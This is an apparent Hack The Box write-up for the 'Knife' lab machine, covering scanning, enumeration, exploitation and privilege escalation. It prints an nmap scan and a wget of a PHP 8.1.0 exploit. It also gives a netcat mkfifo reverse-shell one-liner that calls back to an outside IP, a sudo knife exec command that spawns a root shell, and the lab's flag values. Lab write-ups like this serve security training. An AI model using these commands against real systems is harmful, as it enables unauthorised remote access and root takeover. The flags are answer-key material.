HACK THE BOX

MACHINE-KNIFE

SUBMITTED BY
VIVEK A

PENETRATION TEST METHODS

  SCANNING
 ENUMERATION
 EXPLOITATION
 PRIVILEGE ESCALATION

The IP address of the target machine is 10.10.10.242

1.SCANNING
Now we need to scan the vulnerabilities in this machine. For that we use NMAP command .

sudo nmap -Ss -A 10.10.10.242

2. ENUMERATION
We opened port 80 and the website got opened. But there is nothing we can do in this website.

Next we looked “robot.txt” but the requested URL is not found.

Then we used a tool called wappalyzer to enumerate further. By using that tool we got the PHP
version of the website as 8.1.0.
I searched for the exploit of PHP 8.1.0 and found out the program file for exploitation.

Then using wget I downloaded the program file and renamed it to a PYTHON file.
wget https://www.exploit-db.com/raw/49933
3. EXPLOITATION
Then I run the python file and exploited the target machine.
python file.py

After exploiting this machine , still I couldn’t do any of the operations. So to continue further I
used another tool called NETCAT to exploit further.

Then using the previous terminal in which python is running I entered the following code.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.75 1234 >/tmp/f
This code is entered to move further using NETCAT.

As soon as the code is entered we moved further.

As I looked into the home directory in the system, I got the user directory JAMES and found out the user flag.
3996b98220f1bb8b675640e9f5086408
4. PRIVILEGE ESCALATION
Using the below mentioned code, we are trying to get root access.
sudo /usr/bin/knife exec --exec "exec '/bin/bash -i'"

At last we got the root access and found out the root flag.
1ce3e62bc3d0600f691e21eb4a41a411

Finally the machine KNIFE is successfully completed.